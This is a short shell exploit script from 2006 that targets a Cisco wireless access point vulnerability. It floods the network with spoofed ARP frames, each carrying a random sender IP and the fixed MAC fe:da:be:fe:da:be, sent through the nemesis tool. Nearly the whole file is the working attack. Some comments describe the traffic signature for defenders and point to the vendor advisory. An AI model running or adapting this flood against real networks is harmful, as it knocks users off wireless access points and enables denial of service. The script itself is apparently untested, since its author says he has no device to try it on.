#!/bin/sh
# kokanin 20060115 - yay sunday morning! this is an exploit for
# http://www.cisco.com/warp/public/707/cisco-sa-20060112-wireless.shtml
# Made for my man in Hong Kong, j0 Ole, greetings from www.lort.dk
# Uses/needs nemesis(.sf.net) and jot (FreeBSD builtin) for random ip generation.
# The script should be tested against an actual Cisco AP to determine the needed
# packetamount and stuff, but I don't have one.

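# Where is nemesis?
nemesis=/usr/local/bin/nemesis

# Print the usage line on stderr and stop with a non-zero status.
# (The original signalled its own PID from a subshell, which ended the
# script by SIGTERM instead of returning an ordinary exit status.)
usage() {
  echo "usage: blabla.sh <interface> <amount>" >&2
  exit 1
}

# did the user supply a device and the amount?
#   $1 - network interface handed to nemesis with -d
#   $2 - number of ARP frames to emit; must be a plain decimal count
[ -n "$1" ] || usage
case $2 in
  '' | *[!0-9]*) usage ;;
esac

# Stop early with a clear message if a required tool is missing, rather
# than printing "done" after a loop in which nothing was sent.
[ -x "$nemesis" ] || { echo "nemesis not found at $nemesis" >&2; exit 1; }
command -v jot >/dev/null 2>&1 || { echo "jot not found in PATH" >&2; exit 1; }

# What ends up on the wire, as a defender would see it: one ARP frame per
# iteration, Ethernet destination ff:ff:ff:ff:ff:ff, always the same source
# and sender MAC fe:da:be:fe:da:be, with a freshly randomised sender IP (-S)
# and the same four octets reversed as the target IP (-D). A single MAC
# claiming a new IP in every frame is the observable signature of this
# traffic. Fixed software and workarounds are in the Cisco advisory
# referenced in the header of this file.
for i in $(jot "$2"); do
  # Four independent random octets in 1..255.
  oct1=$(jot -r 1 1 255)
  oct2=$(jot -r 1 1 255)
  oct3=$(jot -r 1 1 255)
  oct4=$(jot -r 1 1 255)
  "$nemesis" arp -v -S "$oct1.$oct2.$oct3.$oct4" -D "$oct4.$oct3.$oct2.$oct1" \
    -h fe:da:be:fe:da:be -m fe:da:be:fe:da:be -d "$1" -H fe:da:be:fe:da:be \
    -M ff:ff:ff:ff:ff:ff
# nemesis runs verbose (-v); only its "Protocol" line is kept, and fields
# 3-5 of that line are echoed as a per-frame progress message.
done | grep Protocol | awk '{ print "injecting: " $3" "$4" "$5}'
echo "done"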
